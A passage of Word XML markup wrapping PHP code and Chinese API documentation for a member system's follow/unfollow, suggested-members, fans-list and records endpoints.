        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7C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gt; $token,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F01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BF6E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E072C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5437E3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重置密码失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1684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DF01D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FACAB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37B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9FD94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478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9AB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member/follow_member </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注｜取消关注会员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550C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关注｜取消关注会员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260EB2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1CD2C3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C9BE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63C5E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Integer} member_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A706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用户关注｜取消关注会员成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04422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follow   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标识位：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已关注；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消关注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A372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关注会员失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30660A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55A426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7408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_member()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F85B8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348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7B343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this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D84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4B4BE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4F9E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然后关注会员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AEFC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2E11C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EB6C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B33C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input('param.member_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B1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 '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F12A5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9747F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会员</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53A8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02134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4F68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member_id == $this-&gt;memberId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59676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F952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不可以关注自己</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E19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28975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BD2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FBD4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC58D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member_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E197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748C7F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF71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z_uid'] = $member_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1A6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 = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE6C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4B85F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6D5A9B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member_guanzhu)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480497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guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73393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data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E05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delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3180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105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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户取消关注会员成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F51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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A141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D4D4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5E23D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2369F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guanzhu_id = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330F6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insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D85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guanzhu_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028175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B803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用户关注会员成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1C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 =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419E8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D70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F48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E4B9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1C03C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6E5D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会员不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEDC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1EE33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FEAF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914A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F31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CFC7E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用户关注会员失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A5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08D1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B15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F232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778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mber/suggested_members </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐关注的会员列表（你的好友还关注了）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480DC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推荐关注的会员列表（你的好友还关注了）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335C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51DB9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7125EB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6C467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t         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C14D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username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐关注的会员名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD5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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐关注的会员头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FE9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ret.follow  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否已经关注该会员：</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10F524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用户关注会员失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791C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1FB656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308E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uggested_members()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD2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6D9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076AC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278299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84C0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496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56A7FA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054FD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45DA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CB00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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF6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ollowed_member_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD7D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_be_followed_member_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5574D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members = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFF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gz_uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E2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here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256668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64BD0F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members) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FDB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ollowed_members as $followed_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4E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member_ids[] = $followed_member['gz_uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F6E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6E10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ed_member_ids[] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B5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ollowed_member_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624C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_be_followed_members = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D085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gz_uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A30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in', $followed_member_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AA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not in', $followed_member_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BCA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5BAA13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6B12E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_be_followed_members = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765A83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gz_uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09705E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10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DDFC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D20F6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A38B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to_be_followed_members) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41384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to_be_followed_members as $to_be_followed_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28025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_be_followed_member_ids[] = $to_be_followed_member['gz_uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D459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F79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EB2A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C85C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to_be_followed_member_ids) &gt;= 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2793D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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDA4A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n', $to_be_followed_member_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D710F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455BEF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72F41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count($followed_member_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19905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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510C54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s_elite', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CF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not in', $followed_member_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE9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547CF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5931FF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E1D9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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036D8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order('is_elite', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531CB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limit(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA408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45E754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A51E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suggested_members) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1785ED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suggested_members as $key =&gt; $suggested_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08041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uggested_member['nickname']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F972A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username'] = $suggested_member['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05440A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uggested_member['user']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E7F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uggested_members[$key]['username'] = $suggested_member['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A8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uggested_member['mobile']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD960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username'] = substr($suggested_member['mobile'], 0, 3) . '****' . substr($suggested_member['mobile'], 7, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D0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uggested_member['email']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585A5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username'] = $suggested_member['email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733417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073B3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username'] = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . _userName_id($suggested_member['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BFB5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9B4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img'] = $suggested_member['img'] ? _imgUrl() . $suggested_member['img'] : '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B212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follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72366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uggested_members[$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C71F4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2AC76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suggested_member['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7510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2BF7C0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AF9F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89C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suggested_members);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26767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A396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D43B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get} /api/member/fans </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>粉丝列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00013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粉丝列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FA0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会员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CB7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3D587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05634C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age        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8AB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per_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD03A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Json} result            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回粉丝列表数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B623B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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429999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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEEB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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669DA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List} data              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904DB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username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>粉丝名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7094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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>粉丝头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF31F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Integer} data.follow  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否已经关注该会员：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902E4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信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F077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code     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误状态码（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>222</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：用户未登录）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C078D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C06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ns()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DEE6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32AA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDF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gz_uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA1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8793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D1CB3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先登录账号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3124B0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67831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2D3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517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ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC1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ge = input('param.page', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C59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 input('param.per_page', 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15E0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 = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61405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eld('uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0F3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here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FA6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select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAE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ans) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292AAE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ans as $fans_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A4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ids[] = $fans_member['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A70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8C42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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD5E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n', $fans_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB4FF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paginate($per_page, false, ['page' =&gt; $page,])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6C7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toArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0C31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fans_members['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB4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fans_members['data'] as $key =&gt; $fans_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F4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ans_member['nickname']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DBD5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username'] = $fans_member['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C889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fans_member['user']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E114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username'] = $fans_member['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490000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fans_member['mobile']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2021B5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username'] = substr($fans_member['mobile'], 0, 3) . '****' . substr($fans_member['mobile'], 7, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4840BE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fans_member['email']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D40B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username'] = $fans_member['email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD53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1A9D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username'] = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . _userName_id($fans_member['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC7BC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942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img'] = $fans_member['img'] ? _imgUrl() . $fans_member['img'] : '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BCD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follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BE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data'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F441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gz_uid', $fans_member['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5588E7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0033C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count('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0569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A15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159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A426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ans_members = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F3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 =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E235E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_page' =&gt; 6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDEF0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rent_page' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB6A6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gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5615A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3B50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9335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fans_members);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48744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99E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rds()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0ED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BDC6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 input('param.money') ? input('param.money') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D804F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ype = input('param.type') ? input('param.type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DC2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input('param.data') ? input('param.data') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1E8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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6366E9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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B4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ney) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ADE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ney == '-1') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07956B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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58E0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EB5AD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money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5D5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645E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8002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22EA1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 = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACB81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4194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3AF4CD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ata'] = $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7832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4647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45208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records')-&gt;where($where)-&gt;order('id desc')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F4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money' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 'score' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>积分</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 'jingyan' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经验值</w:t>
      </w:r>
